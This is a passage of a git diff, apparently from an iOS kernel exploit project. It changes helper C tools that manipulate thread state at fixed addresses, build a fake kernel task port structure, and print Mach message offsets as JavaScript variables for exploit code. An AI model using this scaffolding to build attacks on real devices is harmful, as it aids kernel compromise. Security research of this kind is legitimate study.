thread_set_state(0x1300000, ARM_THREAD_STATE, 0x1305008, ARM_THREAD_STATE_COUNT); + + printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr)); + kr = thread_get_state(0x1300000, ARM_THREAD_STATE, 0x1304008, 0x1301000); + + printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr)); + printf("%x\n", *(uint32_t*)0x1302008); + printf("still alive?\n"); + kr = thread_resume(0x1300000); + + printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr)); + printf("still alive?\n"); + + printf("still alive?\n"); + + return 0; } \ No newline at end of file diff --git a/tools/test.c b/tools/test.c old mode 100644 new mode 100755 diff --git a/tools/testlol.c b/tools/testlol.c old mode 100644 new mode 100755 index 5849b99..362b6fa --- a/tools/testlol.c +++ b/tools/testlol.c @@ -1,99 +1,101 @@ -#include -#include -#include -//#include -//#include - -typedef struct __attribute__((__packed__)) { - uint32_t ip_bits; - uint32_t ip_references; - struct __attribute__((__packed__)) { - uint32_t data; - uint32_t pad; - uint32_t type; - } ip_lock; - struct __attribute__((__packed__)) { - struct __attribute__((__packed__)) { - struct __attribute__((__packed__)) { - uint32_t flags; - uintptr_t waitq_interlock; - uint64_t waitq_set_id; - uint64_t waitq_prepost_id; - struct __attribute__((__packed__)) { - uintptr_t next; - uintptr_t prev; - } waitq_queue; - } waitq; - uintptr_t messages; - natural_t seqno; - natural_t receiver_name; - uint16_t msgcount; - uint16_t qlimit; - } port; - uintptr_t imq_klist; - } ip_messages; - natural_t ip_flags; - uintptr_t ip_receiver; - uintptr_t ip_kobject; - uintptr_t ip_nsrequest; - uintptr_t ip_pdrequest; - uintptr_t ip_requests; - uintptr_t ip_premsg; - uint64_t ip_context; - natural_t ip_mscount; - natural_t ip_srights; - natural_t ip_sorights; -} kport_t; - -int main(int argc, char* argv[]) { - printf("var MACH_PORT_RIGHT_RECEIVE = 0x%x;\n", MACH_PORT_RIGHT_RECEIVE); - printf("var MACH_MSG_TYPE_MAKE_SEND = 0x%x;\n", MACH_MSG_TYPE_MAKE_SEND); - printf("var MACH_PORT_LIMITS_INFO = 0x%x;\n", MACH_PORT_LIMITS_INFO); - printf("var MACH_PORT_LIMITS_INFO_COUNT = 0x%x;\n", MACH_PORT_LIMITS_INFO_COUNT); - printf("var MACH_MSG_OOL_PORTS_DESCRIPTOR = 0x%x;\n", MACH_MSG_OOL_PORTS_DESCRIPTOR); - printf("var kport_size = 0x%x;\n", sizeof(kport_t)); - kport_t kport[2] = {}; - uintptr_t *ptr = (uintptr_t*)(kport + 1); - kport->ip_bits = 0x80000002; // IO_BITS_ACTIVE | IOT_PORT | IKOT_TASK - kport->ip_references = 100; - kport->ip_lock.type = 0x11; - kport->ip_messages.port.qlimit = 777; - kport->ip_receiver = 0x12345678; // dummy - kport->ip_srights = 99; - typedef struct { - mach_msg_header_t Head; - mach_msg_body_t msgh_body; - mach_msg_ool_ports_descriptor_t init_port_set[0]; - } Request; - - printf("%x\n", sizeof(Request)); - printf("%x\n", sizeof(mach_msg_ool_ports_descriptor_t)); - printf("var req_init_port_set = 0x%x\n", offsetof(Request, init_port_set)); - printf("var req_init_port_set_address = 0x%x\n", offsetof(mach_msg_ool_ports_descriptor_t, address)); - printf("var req_init_port_set_count = 0x%x\n", offsetof(mach_msg_ool_ports_descriptor_t, count)); -// printf("var req_init_port_set_disposition = 0x%x\n", offsetof(Request, init_port_set) + offsetof(mach_msg_ool_ports_descriptor_t, disposition)); -// printf("var req_init_port_set_deallocate = 0x%x\n", offsetof(Request, init_port_set) + offsetof(mach_msg_ool_ports_descriptor_t, deallocate)); -// printf("var req_init_port_set_type = 0x%x\n", offsetof(Request, init_port_set) + offsetof(mach_msg_ool_ports_descriptor_t, type)); - printf("var req_head_msgh_bits = 0x%x\n", offsetof(Request, Head.msgh_bits)); - printf("var req_head_msgh_request_port = 0x%x\n", offsetof(Request, Head.msgh_remote_port)); - printf("var req_head_msgh_reply_port = 0x%x\n", offsetof(Request, Head.msgh_local_port)); - printf("var req_head_msgh_id = 0x%x\n", offsetof(Request, Head.msgh_id)); - printf("var req_msgh_body_msgh_descriptor_count = 0x%x\n", offsetof(Request, msgh_body.msgh_descriptor_count)); - - printf("%x\n", sizeof(mach_msg_header_t)); - - printf("%x\n", MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE)); - printf("%x\n", MACH_SEND_MSG|MACH_MSG_OPTION_NONE); - printf("%x\n", MACH_MSG_TIMEOUT_NONE); - - printf("var kport_ip_bits%x = 0x%x;\n", 4, offsetof(kport_t, ip_bits)); - printf("var kport_ip_references%x = 0x%x;\n", 4, offsetof(kport_t, ip_references)); - printf("var kport_ip_lock_type%x = 0x%x;\n", 4, offsetof(kport_t, ip_lock.type)); - printf("var kport_ip_messages_port_qlimit%x = 0x%x;\n", 2, offsetof(kport_t, ip_messages.port.qlimit)); - printf("var kport_ip_receiver%x = 0x%x;\n", 4, offsetof(kport_t, ip_receiver)); - printf("var kport_ip_srights%x = 0x%x;\n", 4, offsetof(kport_t, ip_srights)); - printf("var MIG_MAX = 0x%x\n", 0x1000); - printf("var NDR_record = %x %x %x %x\n", NDR_record); - - return 0; +#include +#include +#include +#include +//#include +//#include + +typedef struct __attribute__((__packed__)) { + uint32_t ip_bits; + uint32_t ip_references; + struct __attribute__((__packed__)) { + uint32_t data; + uint32_t pad; + uint32_t type; + } ip_lock; + struct __attribute__((__packed__)) { + struct __attribute__((__packed__)) { + struct __attribute__((__packed__)) { + uint32_t flags; + uintptr_t waitq_interlock; + uint64_t waitq_set_id; + uint64_t waitq_prepost_id; + struct __attribute__((__packed__)) { + uintptr_t next; + uintptr_t prev; + } waitq_queue; + } waitq; + uintptr_t messages; + natural_t seqno; + natural_t receiver_name; + uint16_t msgcount; + uint16_t qlimit; + } port; + uintptr_t imq_klist; + } ip_messages; + natural_t ip_flags; + uintptr_t ip_receiver; + uintptr_t ip_kobject; + uintptr_t ip_nsrequest; + uintptr_t ip_pdrequest; + uintptr_t ip_requests; + uintptr_t ip_premsg; + uint64_t ip_context; + natural_t ip_mscount; + natural_t ip_srights; + natural_t ip_sorights; +} kport_t; + +int main(int argc, char* argv[]) { + printf("var MACH_PORT_RIGHT_RECEIVE = 0x%x;\n", MACH_PORT_RIGHT_RECEIVE); + printf("var MACH_MSG_TYPE_MAKE_SEND = 0x%x;\n", MACH_MSG_TYPE_MAKE_SEND); + printf("var MACH_PORT_LIMITS_INFO = 0x%x;\n", MACH_PORT_LIMITS_INFO); + printf("var MACH_PORT_LIMITS_INFO_COUNT = 0x%x;\n", MACH_PORT_LIMITS_INFO_COUNT); + printf("var MACH_MSG_OOL_PORTS_DESCRIPTOR = 0x%x;\n", MACH_MSG_OOL_PORTS_DESCRIPTOR); + printf("var kport_size = 0x%x;\n", sizeof(kport_t)); + kport_t kport[2] = {}; + uintptr_t *ptr = (uintptr_t*)(kport + 1); + kport->ip_bits = 0x80000002; // IO_BITS_ACTIVE | IOT_PORT | IKOT_TASK + kport->ip_references = 100; + kport->ip_lock.type = 0x11; + kport->ip_messages.port.qlimit = 777; + kport->ip_receiver = 0x12345678; // dummy + kport->ip_srights = 99; + typedef struct { + mach_msg_header_t Head; + mach_msg_body_t msgh_body; + mach_msg_ool_ports_descriptor_t init_port_set[0]; + } Request; + + printf("%x\n", sizeof(Request)); + printf("%x\n", sizeof(mach_msg_ool_ports_descriptor_t)); + printf("var req_init_port_set = 0x%x\n", offsetof(Request, init_port_set)); + printf("var req_init_port_set_address = 0x%x\n", offsetof(mach_msg_ool_ports_descriptor_t, address)); + printf("var req_init_port_set_count = 0x%x\n", offsetof(mach_msg_ool_ports_descriptor_t, count)); + printf("%x %x %x %x %x\n", PROT_READ, PROT_WRITE, PROT_EXEC, MAP_PRIVATE, MAP_ANON); +// printf("var req_init_port_set_disposition = 0x%x\n", offsetof(Request, init_port_set) + offsetof(mach_msg_ool_ports_descriptor_t, disposition)); +// printf("var req_init_port_set_deallocate = 0x%x\n", offsetof(Request, init_port_set) + offsetof(mach_msg_ool_ports_descriptor_t, deallocate)); +// printf("var req_init_port_set_type = 0x%x\n", offsetof(Request, init_port_set) + offsetof(mach_msg_ool_ports_descriptor_t, type)); + printf("var req_head_msgh_bits = 0x%x\n", offsetof(Request, Head.msgh_bits)); + printf("var req_head_msgh_request_port = 0x%x\n", offsetof(Request, Head.msgh_remote_port)); + printf("var req_head_msgh_reply_port = 0x%x\n", offsetof(Request, Head.msgh_local_port)); + printf("var req_head_msgh_id = 0x%x\n", offsetof(Request, Head.msgh_id)); + printf("var req_msgh_body_msgh_descriptor_count = 0x%x\n", offsetof(Request, msgh_body.msgh_descriptor_count)); + + printf("%x\n", sizeof(mach_msg_header_t)); + + printf("%x\n", MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE)); + printf("%x\n", MACH_SEND_MSG|MACH_MSG_OPTION_NONE); + printf("%x\n", MACH_MSG_TIMEOUT_NONE); + + printf("var kport_ip_bits%x = 0x%x;\n", 4, offsetof(kport_t, ip_bits)); + printf("var kport_ip_references%x = 0x%x;\n", 4, offsetof(kport_t, ip_references)); + printf("var kport_ip_lock_type%x = 0x%x;\n", 4, offsetof(kport_t, ip_lock.type)); + printf("var kport_ip_messages_port_qlimit%x = 0x%x;\n", 2, offsetof(kport_t, ip_messages.port.qlimit)); + printf("var kport_ip_receiver%x = 0x%x;\n", 4, offsetof(kport_t, ip_receiver)); + printf("var kport_ip_srights%x = 0x%x;\n", 4, offsetof(kport_t, ip_srights)); + printf("var MIG_MAX = 0x%x\n", 0x1000); + printf("var NDR_record = %x %x %x %x\n", NDR_record); + + return 0; } \ No newline at end of file diff --git a/tools/thread_shit.c b/tools/thread_shit.c old mode 100644 new mode 100755 -- cgit v1.2.3